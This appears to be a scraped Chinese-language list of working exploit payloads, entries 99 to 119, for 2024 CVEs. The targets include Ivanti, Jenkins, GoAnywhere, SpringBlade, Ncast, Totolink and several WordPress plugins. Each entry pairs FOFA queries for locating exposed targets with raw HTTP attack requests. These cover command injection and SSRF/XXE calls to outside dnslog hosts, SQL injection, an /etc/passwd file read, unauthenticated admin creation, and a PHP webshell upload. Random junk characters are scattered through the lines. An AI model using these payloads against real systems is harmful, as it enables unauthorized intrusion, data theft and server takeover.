7 {8 x+ x* \+ P7 C6 ]0 O" w8 OContent-Type: application/x-www-form-urlencoded; charset=UTF-83 C; p. L2 V0 G% C' }0 Q& s5 S
X-Requested-With: XMLHttpRequest6 k& [" U5 o3 d, `) N- D- F4 ~$ Y
" L1 c# W8 Q1 T% x- _; P& h- V
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
8 C7 K9 {! i: O5 h% g+ g3 G7 l
2 u S- _4 {5 Z
5 }' [1 k- [2 A; G) ]; C& `! R99. Ncast盈可视高清智能录播系统busiFacade RCE, c' _/ Y3 [% ~) p0 w9 V( c
CVE-2024-0305
5 r: W3 G0 z `' h3 J9 j7 L5 _FOFA:app="Ncast-产品" && title=="高清智能录播系统"
$ I$ X( }% y9 B7 T6 `# m9 HPOST /classes/common/busiFacade.php HTTP/1.1
4 O$ s. u6 g. M- D! JHost: 192.168.40.130:8080
5 I7 p" b) N; `& a( L( D& ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: d$ K U) K' V9 e1 f$ X5 ^Connection: close4 Q. E3 x: q* Y; F
Content-Length: 1545 p* n; o: t H3 b; c5 I) L
Accept: */*& {$ @' S* a4 Y& T- D7 R/ c
Accept-Encoding: gzip, deflate0 v5 J% Y4 C) i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# |1 u# C1 @$ t# i' BContent-Type: application/x-www-form-urlencoded; charset=UTF-8
8 ^4 c$ V, y% N! w4 A6 @. {X-Requested-With: XMLHttpRequest
/ `' r( f+ A: {% I' q1 U( g% x1 T: M1 {
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
3 |" i/ f d/ y0 I2 M7 u* H
9 a8 R$ w) Y& s+ @& k: O# E$ V) [/ B7 ?( x* O& D! V
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
% \/ n0 |' b% G2 v. g% xCVE-2024-03529 R& ?9 d4 P$ H6 a2 t
FOFA:icon_hash="874152924"
* W: u S1 u( i8 @' X) @POST /api/file/formimage HTTP/1.1
* |; P8 i: o4 i ~: o( ` vHost: 192.168.40.1302 H0 a; o6 @9 M# M
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
$ Y6 ]# e- w6 ]Connection: close% m( X& J9 i! ~9 ]
Content-Length: 201
" T3 R% F! ~1 x8 P: j1 QContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei+ K0 ?6 R. h# i' a# ^& q) w
Accept-Encoding: gzip$ n. X* C- P/ d5 O/ L
7 ?3 b3 @" V% C------WebKitFormBoundarygcflwtei
2 g, V" H3 A; s/ y$ j* X. vContent-Disposition: form-data; name="file";filename="IE4MGP.php"
+ |5 {; t; G; y- w! \# RContent-Type: application/x-php
) P/ j) u K6 V) d! g. u
6 z3 ~2 Q- `- j2 K9 S6 P: {2ayyhRXiAsKXL8olvF5s4qqyI2O
. V0 H1 d1 k# C& S% }! Q% U! z------WebKitFormBoundarygcflwtei--
4 _2 ]: {" {8 H! u/ s) c7 k5 ]5 R
6 T& [1 F; o. g( q# c' W4 G101. ivanti policy secure-22.6命令注入
! b" S" s2 H) C# O7 Y1 r- x' {5 d$ U) qCVE-2024-21887& O3 h& W0 z I1 s& t6 f" X6 Q& s
FOFA:body="welcome.cgi?p=logo"; h; [9 X- c( i2 |# \3 Z
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
) J0 C5 m0 U. Y* {# x6 e2 xHost: x.x.x.xx.x.x.x% v% I, ~2 v4 A% [9 m" O( o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 C+ Q' a. Z! Z" m8 @- E a- `
Connection: close% k- F$ O u9 J3 K# f1 I: k
Accept-Encoding: gzip
% E8 \5 `4 y: V3 W9 g+ \8 d* M& Y7 T0 Q: w' X, |) ]
8 X" G$ f, B8 S4 u: `
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行9 g. x% \9 o) f: e5 N
CVE-2024-21893
9 Y0 e) q" `0 f; I( o' J8 [+ u3 PFOFA:body="welcome.cgi?p=logo") ^+ O. i3 c) @( k! x) g& C
POST /dana-ws/saml20.ws HTTP/1.1
! g; V, V9 Z5 |8 [; CHost: x.x.x.x/ G1 J4 ?, d/ A5 {# x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
, t8 k F! u9 v( K6 L1 cConnection: close8 b" F$ \; H' t/ w' D& ^
Content-Length: 792, d( B4 x+ v' D+ p# D9 |7 W
Accept-Encoding: gzip
4 P% \4 I% {; ~, t6 m K3 g# f0 T" z5 R: |
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>% a" D3 s% ?2 p: M8 @9 M
" r9 u* M6 n+ Z: w# d3 R
103. Ivanti Pulse Connect Secure VPN XXE2 u' c7 A8 @; d! _4 ]
CVE-2024-22024# ]' _. `& g1 k: C! z
FOFA:body="welcome.cgi?p=logo"/ I1 V/ p- @) @ j; M4 n; U9 r% D- g! Y; t
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
; J/ [: J% ?( x" _/ t, k3 pHost: 192.168.40.130:111' a H6 _ U N# c1 } K' Z* ~, m3 N
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.369 V: Q" I/ w1 f/ Q G" z; `# o
Connection: close7 n" R2 h0 D# j
Content-Length: 2045 t5 M! k; r# E: S
Content-Type: application/x-www-form-urlencoded
! r$ x2 a, R# E) n+ x9 G1 _Accept-Encoding: gzip
% ]; w+ G( G) p9 ]! r# N9 e1 H! ~$ o8 ~/ ^
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
& h+ _8 l' Y% O3 n1 |- i3 ~! n* R' Y
2 P' P& d, P/ i7 f1 o e0 [& f
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下/ `6 m9 ~" G8 E( d/ w& H
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r># _+ S# h/ l; G- `5 }2 x2 B0 h$ g
/ G9 s, y' W F# E M
; E7 @8 j5 `5 E4 ~$ i8 |104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露4 F5 B1 z- Y+ R2 I: v
CVE-2024-0569
- R/ m: X4 Z' N0 D- @6 m1 ZFOFA:title="TOTOLINK"
# G7 a. j! |8 K, R" C/ PPOST /cgi-bin/cstecgi.cgi HTTP/1.1, V: c/ J( _1 Q$ _
Host:192.168.0.13 e8 ^$ x: w4 f0 _$ O. P, E6 H
Content-Length:41
3 @: R2 u# \5 E$ }+ v1 IAccept:application/json,text/javascript,*/*;q=0.019 \" ]; u3 l3 V+ n4 B! R; P8 q8 {
X-Requested-with: XMLHttpRequest
5 M7 x; q) L7 N4 w3 _User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36 P/ |- P0 g" G, l" H% k: {7 x
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
' I5 d5 x7 z8 {$ U6 lOrigin: http://192.168.0.1+ |6 m6 I4 o* i+ {+ ^: q' }
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
- E+ Z( a) r, L9 ~3 ?9 Y% SAccept-Encoding:gzip,deflate# m6 Q+ n. J7 h; C! O) ^
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
1 z$ g: {! z) {+ BConnection:close6 V. z. ~! s8 S% a! B& N
; Z- X' w7 P; s3 e{8 z7 [1 g$ G* z6 M8 \4 _" d; r
"topicurl":"getSysStatusCfg",5 E& W- M L$ g: L% v2 C6 L
"token":""
5 O. H3 r3 y9 m) H9 q# | w}$ c G. {# {+ A# ~/ a
: _" y+ }( q1 ~: j3 A6 H. L& x105. SpringBlade v3.2.0 export-user SQL 注入( u4 q) N9 Z" B
FOFA:body="https://bladex.vip"" K* L! N% n4 a* P5 S. G
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=17 w5 ]7 g2 X4 r9 R
4 y, P V4 J/ {
106. SpringBlade dict-biz/list SQL 注入
/ H4 Z& ~/ l% P! A K3 J1 w! VFOFA:body="Saber 将不能正常工作"8 o% ^5 g9 P0 {6 f
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
% ^& K% q9 v0 [+ C- H: |- ]Host: your-ip
/ e3 {) ]( b5 F7 d6 N, uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 E9 n* Q8 M: I3 b2 s. V- J+ IBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
3 t6 v5 ^) O; [8 f6 tAccept-Encoding: gzip, deflate' X* W, x1 ^! c
Accept-Language: zh-CN,zh;q=0.9) G% y8 K, K, |* Z, ^1 q# o M
Connection: close
2 v* a( g: E: O/ }
- k& N5 P" ]+ H& ^$ b; _2 c/ r: ^
6 O1 ]: E0 h5 Y# B6 P: E0 O3 c107. SpringBlade tenant/list SQL 注入0 ]- O! `$ o$ D/ W/ b2 _8 J
FOFA:body="https://bladex.vip"
: b) n/ m' J2 P5 n5 ~5 HGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1: r7 `- k, x7 u0 Q" d
Host: your-ip0 o9 ]& R7 f. E+ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 ~3 o0 o+ v/ U- N/ lBlade-Auth:替换为自己的
; y5 s( K; V7 P' I! ^Connection: close+ @: l9 q1 |2 ^) s% N, e: Y
: E$ J, A9 c0 `0 F0 O0 l: g
* ]+ y7 D% S# }& l5 K/ b108. D-Tale 3.9.0 SSRF9 E7 ?; U6 z6 O) p
CVE-2024-216428 b- | N( g" L4 A" M8 S3 s
FOFA:"dtale/static/images/favicon.png"
& l$ c1 X8 T0 [4 BGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.13 }# A8 L. J' _. \/ j
Host: your-ip3 S6 B* k4 s) p
Accept: application/json, text/plain, */*/ o. ~! |8 b9 J% m+ x7 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 n$ f% S$ K; W+ R3 Z( J! g
Accept-Encoding: gzip, deflate: |% J& D, x' `3 Q Q/ D: y/ B: L
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
7 g' M! X( I3 f. k1 ~1 N1 p8 JConnection: close
. g* n. k$ K+ R- @$ f& t
' [/ Q6 j0 } T, e- q" M# m* I# ]* l# x( r
109. Jenkins CLI 任意文件读取$ z* ^6 |4 _4 }7 V# r
CVE-2024-23897
5 ]1 w9 r* ]2 Z- t4 D5 EFOFA:header="X-Jenkins"# |) i5 D0 k+ W( M! [5 P
POST /cli?remoting=false HTTP/1.1
3 x, L# z3 j' y! rHost:
. Q3 b4 o. o0 T3 R. k* AContent-type: application/octet-stream
5 s# k9 \# M# x0 wSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
`' J- J% F+ ?Side: upload! G! T; I3 ~ ], ?
Connection: keep-alive8 q: E1 [; |: A& _3 x
Content-Length: 163
3 F( x. b1 I7 u# c2 D: G0 Y. p. N8 k- ?7 e- O C9 v
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03', I, v' x0 B9 J& d
! g" K0 \. E$ B+ `% X" g; i/ }
% X$ ^& i. C5 p- o8 s$ N9 tPOST /cli?remoting=false HTTP/1.1' G4 \, o. i [+ c) O2 W( I. F
Host:
) j0 z+ y4 f& p: E$ x( D7 ASession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92 Q; l! t, W5 e/ V5 k" ^
download G) i- d6 ~; ^/ ~, W' T. H" R/ P
Content-Type: application/x-www-form-urlencoded% |4 z9 j" A8 `/ T9 s- M* D3 v6 m
Content-Length: 05 h7 U: w" p8 }- s- n
' N+ s: h. b' Y1 ^
v. G X2 V+ f, ?! ^ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin* ?0 v2 j' m0 s
java -jar jenkins-cli.jar help
1 b& ], S+ F/ h3 u8 m[COMMAND]
) A. _5 x) P- T k- PLists all the available commands or a detailed description of single command.! b9 h/ K; _8 ~3 J9 y
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)0 V: j# S& E& |- ]- R" e
! {3 e, @ P. U5 W0 Z& B7 n9 z% T/ G
. a7 j/ b0 l' g; e9 c K P, A6 s; \110. Goanywhere MFT 未授权创建管理员
) V0 e4 I7 I) w3 r* x! O/ tCVE-2024-02040 w3 t- q% o& f y& q2 R" a
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"7 T' |: P7 T _' v }% O
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
: o4 z( z5 q* s5 d4 R' M- XHost: 192.168.40.130:8000
4 ]$ A' [# @. u N3 kUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
|# i+ @( i. y6 t- YConnection: close" I2 Y9 i$ [0 N1 h' e( x4 f/ A
Accept: */*
0 \% ]# x% A$ aAccept-Language: en2 k3 \5 U3 v* w3 i( Y$ O
Accept-Encoding: gzip4 ~# {. C8 }" [: n
( \' b' h( p6 F/ b" {- J' s
7 v1 s* | z; M4 G) @! v I111. WordPress Plugin HTML5 Video Player SQL注入
5 V' z7 J/ |9 F! @CVE-2024-10614 r& \( X" Q- C# w/ } V
FOFA:"wordpress" && body="html5-video-player"
! e1 z3 P5 T* j! i* lGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
. x3 U/ M- `6 H6 a1 M) J2 _Host: 192.168.40.130:112
2 Q# R: c8 |( D, v, j s Z2 \1 iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
l; W# J: w6 bConnection: close
; R1 X8 G* D% z( gAccept: */*
8 S: v% [5 M$ O$ i# CAccept-Language: en
+ b) {/ \4 w, X$ u9 GAccept-Encoding: gzip& z$ r* w( r2 u! ~) C1 S2 H3 W
$ m. J" Z L; Z& z9 s' g2 ^ |
* g( J) r! i' M- f1 S. f& m6 p
112. WordPress Plugin NotificationX SQL 注入3 C1 |5 P" P& ^ o n
CVE-2024-1698
3 N5 E7 S* ^2 \" l0 o2 PFOFA:body="/wp-content/plugins/notificationx"/ _1 C- ~$ x2 H- z7 l
POST /wp-json/notificationx/v1/analytics HTTP/1.1' L( X9 K2 Q. y, ~" V
Host: {{Hostname}}. Z# B3 I9 N; e+ H# F& @8 |3 ?
Content-Type: application/json
+ v" |) s" o+ \# @
; |- U' P! _5 V' c% c# T{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}4 E9 v2 g, a6 }% p5 P
1 m; E- f0 V6 I
6 H) ~3 `% z; O6 N113. WordPress Automatic 插件任意文件下载和SSRF( T/ [7 E/ v) ?9 ^
CVE-2024-27954
3 H8 D" g P& LFOFA:"/wp-content/plugins/wp-automatic"# K3 A+ H9 x3 {2 z
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1) z$ Q8 Z( J' j+ y3 M( u
Host: x.x.x.x7 s a+ x) z0 }1 Y- B$ m& V
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36; h9 W% Z) \% A7 S; m3 b/ q5 {
Connection: close2 s" A8 Q7 @6 c2 D1 ~( X& a
Accept: */*
, L; S4 d# |) C( |4 kAccept-Language: en
" |9 e& M3 L8 F2 P& u: SAccept-Encoding: gzip8 Y4 x& V+ a. i) d* l" E
2 ~( ]. N1 W3 @ y% W
, f+ m4 l2 l* e% \114. WordPress MasterStudy LMS插件 SQL注入
) A. Q8 K1 W1 Q9 x4 C! E' w9 XFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
( Y2 M( o) c0 K; yGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
* A6 D( ~( i, A3 r2 q% I) CHost: your-ip
- b2 x9 U" O2 r1 g1 S7 S: t1 W$ ]User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
7 j8 b; s: `+ w: M0 p$ MAccept-Charset: utf-8- P3 Z8 o) u; O( A+ M' b
Accept-Encoding: gzip, deflate" c: g& g0 i) P9 [" j6 L
Connection: close
* g* K7 f7 T* ~ h2 B0 n! @/ ^* z# e5 a8 e# ~
! U5 @1 a5 @; ~: i6 f# C
115. WordPress Bricks Builder <= 1.9.6 RCE
0 m+ h5 s: S1 W% L/ N ^CVE-2024-25600% O. g, U$ W9 X/ R# P: _
FOFA: body="/wp-content/themes/bricks/"
+ |- I- I7 L4 o) p6 h第一步,获取网站的nonce值/ J- C+ u& |! D; B7 j
GET / HTTP/1.1) t6 R4 j* t: r# L' ^3 a3 [' ^
Host: x.x.x.x
/ f, l# R. m: O' K5 Y* g& UUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36, s) k1 T/ ]! ^! t
Connection: close
& C# X Y" V& |3 Z/ |- LAccept-Encoding: gzip% H; n9 N" }; E- c/ |, z
% J: o1 E$ Y4 F! U C0 U
( _" T! ?8 R! T* B+ @: i) A7 s第二步替换nonce值,执行命令4 H: t5 ?! O8 \# J& O8 P. Q( u
POST /wp-json/bricks/v1/render_element HTTP/1.1% f. _4 R2 F3 L" ^' |
Host: x.x.x.x1 X. G8 q+ j# L% J: S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) W- |9 C" \& g( [
Connection: close
( t# e& P+ p: \" \8 CContent-Length: 356
" _3 c& O1 \0 _9 o' B* eContent-Type: application/json# ]& m; o# a! k( V6 ^( O" ^6 `
Accept-Encoding: gzip
2 O. g8 ]. m( E& s# N% b0 N1 {
5 l" c) G% O2 n! T0 U5 U" p9 g( L{9 T5 ~2 d% L% w! ? U
"postId": "1",5 b, z5 L! a' C' \; {
"nonce": "第一步获得的值",( c3 A: q$ l ]1 Z2 y
"element": {; T% p" A/ z. m- n7 G4 A. i
"name": "container",* q. V/ d- Q* R/ K9 J2 z1 w# @
"settings": {
" a& t2 A" v m+ `) s+ L* i "hasLoop": "true",0 I( [3 l1 X) c6 w% Z
"query": {
( I" }' `, h3 H$ f5 O2 G- U7 d "useQueryEditor": true,
' S) D: o0 K7 r+ m "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",5 Q2 f2 j/ W+ O) K
"objectType": "post"
9 ]" f# h; O% v& |% ^) o/ \9 b" I3 l }2 c5 ` i2 l- g' d6 {5 A2 |
}
- V% ^9 P( K9 q2 g" }" J1 X }* [2 P/ f( L4 ?. q) Z: J x
}7 V8 l: S4 s* {) t/ Y9 ^
- z! s# R. {& i7 S- H1 l* f+ y
. v8 y; ^9 b$ e. [& E# I: a116. wordpress js-support-ticket文件上传
/ B! s q* e- p& |( E7 q8 TFOFA:body="wp-content/plugins/js-support-ticket"* G3 P" q9 c t, D. k* }
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
2 T( O" F0 I- w) ~; J/ e- z. \Host:5 B# @6 g0 S- A$ X/ D; k' E C
Content-Type: multipart/form-data; boundary=--------7670991712 F7 z- g: y i7 L
User-Agent: Mozilla/5.0
3 z8 q* ` @8 D: O/ X' f- _% r
7 z; K. w7 C6 j& g----------7670991710 {4 d. U6 X( S3 ~: B! S6 Y- w
Content-Disposition: form-data; name="action"- r ^& A/ l/ O8 I i
configuration_saveconfiguration2 v9 L% ]# A( M6 ~. V7 w+ J
----------767099171
/ W( O9 T/ R* \6 A" I \: D% Z3 YContent-Disposition: form-data; name="form_request"
% z& m& @$ B. y9 u T. p7 }6 U/ ~jssupportticket$ \2 D" F0 }+ O5 k
----------767099171
4 @6 d g, W/ T/ Z, ^1 N, qContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php": h- y+ l; z x% d& ~; ~
Content-Type: image/png; J- ^ x2 ^% ?1 i
----------767099171--
|, g6 n7 s$ r8 U/ O, q7 Z% |5 ^) I3 \6 `' Q
* r; P- V' w2 T117. WordPress LayerSlider插件SQL注入( J6 D' M7 W3 Z W L l Y$ y
version:7.9.11 – 7.10.04 l/ t! C! n! x8 F
FOFA:body="/wp-content/plugins/LayerSlider/"' }& \) G3 U* M6 A- ^0 }
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.18 q0 N' H( T( |9 d) W3 q
Host: your-ip* x5 G6 `. D w# Y" |; @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 m" v8 F( A; D9 C$ ~- gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) ~! d, X f6 h. }5 [2 X& {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 [( n8 C, ]" c9 z& _
Accept-Encoding: gzip, deflate, br
! C3 y: {0 Z! e3 [3 ~Connection: close
% h! Q" T s3 f1 J) YUpgrade-Insecure-Requests: 1
" I) O9 f. f% s8 v. ^ t
( k; ^: h# F- V$ q; [! H- H
! ~5 e& ?: w+ W% }$ R L118. 北京百绰智能S210管理平台uploadfile.php任意文件上传$ |* R4 s+ }/ M0 [3 Q5 P
CVE-2024-0939
* u/ R; D" c V3 mFOFA:title="Smart管理平台"" h% |6 W! V' m) Y& m
POST /Tool/uploadfile.php? HTTP/1.1
* Q/ o% A) G8 P5 h6 X; sHost: 192.168.40.130:84434 ?1 P, m6 ?2 J
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
6 s. J6 _ g, ~2 N7 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
! a4 D6 {6 c1 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; N' [9 G, g2 M( M ~3 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: d1 Z; U. O" s8 VAccept-Encoding: gzip, deflate
& m7 V% j9 Q5 q4 g9 tContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887; z b3 _/ z6 D9 \" Z8 c& ^
Content-Length: 405
" y% }8 w4 }, ]/ V) p, ?, ?Origin: https://192.168.40.130:8443
/ ~* k( v8 ?8 {& d8 [4 ^- mReferer: https://192.168.40.130:8443/Tool/uploadfile.php
9 A* x8 \- I$ T4 s3 i2 nUpgrade-Insecure-Requests: 1
' B# @ m: \. c, W' eSec-Fetch-Dest: document6 M8 ?! K4 W5 m
Sec-Fetch-Mode: navigate
. R+ M: N9 ^& N/ H/ ESec-Fetch-Site: same-origin+ o( h7 \6 w& V6 V
Sec-Fetch-User: ?1: r1 V+ F2 _; {. \
Te: trailers# J) n: d9 N0 w1 {9 ], b8 L4 \
Connection: close
0 A9 Y4 {$ f( U5 _5 E% C
{3 L6 @: W$ o- L3 ~-----------------------------13979701222747646634037182887; I8 g) p t+ m! m8 d! A2 V
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
+ P* ?! S" ~9 q% N1 uContent-Type: application/octet-stream
4 q! e, L: R7 K7 J2 w
5 f/ z' f$ R4 f/ {4 N" _2 J7 Q<?php
- }/ D% l* P# T: q& usystem($_POST["passwd"]);8 p& _" d% }* Z4 g
?>7 a5 T0 z7 ^) ?4 B9 }( l$ R0 T
-----------------------------13979701222747646634037182887' X$ Y* X+ \: j" s0 B, q
Content-Disposition: form-data; name="txt_path", \, J5 s1 l9 _. C# q) g+ F
6 S8 T4 v6 Y; P7 _5 k! D
/home/src.php
7 d" j5 ~6 S; |5 N Y5 i-----------------------------13979701222747646634037182887--' h) o. V9 n6 k% o& s
) m9 ]2 E2 Q& e5 g7 P* y
E" E3 ~! p2 K. K0 `1 c7 Y& O8 o访问/home/src.php
7 g7 L" s/ p8 r, \6 v2 a. `9 D3 @5 z3 C8 i+ t! W; O
119. 北京百绰智能S20后台sysmanageajax.php sql注入
! n( k. A+ Y! I6 P2 h4 VCVE-2024-1254
' K- _$ h0 M/ G" Y7 @( wFOFA:title="Smart管理平台"
4 G1 K5 D/ T2 E7 t. Y先登录进入系统,默认账号密码为admin/admin
+ O0 ~& Y" x8 H' ]POST /sysmanage/sysmanageajax.php HTTP/1.11
2 \; \" y7 l. aHost: x.x.x.x8 g* E# f$ [. h
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee. I) H4 h2 j) \! ` N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
* C6 ^ ^8 B1 a+ H# s* w& m- U# t! nAccept: */*. f' B# X0 k/ n- v: E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) c/ ^2 I- H' @+ p K+ q" t
Accept-Encoding: gzip, deflate1 J1 S- F2 G8 {! O; @ e6 c# c
Content-Type: application/x-www-form-urlencoded;. z, H$ C; P; c# Q
Content-Length: 1095 _% G4 ?+ r' `# x
Origin: https://58.18.133.60:8443
% m# a E8 L4 H$ p8 \6 S- EReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
1 p6 x" D0 u X2 r- z% M/ iSec-Fetch-Dest: empty
! l# r% Y, l- P& _8 nSec-Fetch-Mode: cors
8 @! `3 j8 X2 [# ]Sec-Fetch-Site: same-origin
# ~+ B' S; K. K- o& P5 y& KX-Forwarded-For: 1.1.1.1
